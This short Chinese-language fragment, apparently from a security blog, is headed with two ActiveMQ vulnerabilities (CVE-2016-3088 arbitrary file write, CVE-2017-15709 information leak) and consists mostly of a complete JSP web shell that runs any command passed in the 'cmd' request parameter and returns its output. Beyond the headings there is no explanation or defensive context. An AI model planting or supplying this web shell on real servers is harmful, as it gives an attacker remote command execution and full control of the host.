Close

28 5 月, 2024

(CVE-2016-3088)(CVE-2017-15709)

ActiveMQ任意文件写入漏洞(CVE-2016-3088) 

<%@ page import="java.io.*"%><% out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null; Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){ out.print(line+"</br>"); }  %>

activemq 信息泄露 (CVE-2017-15709)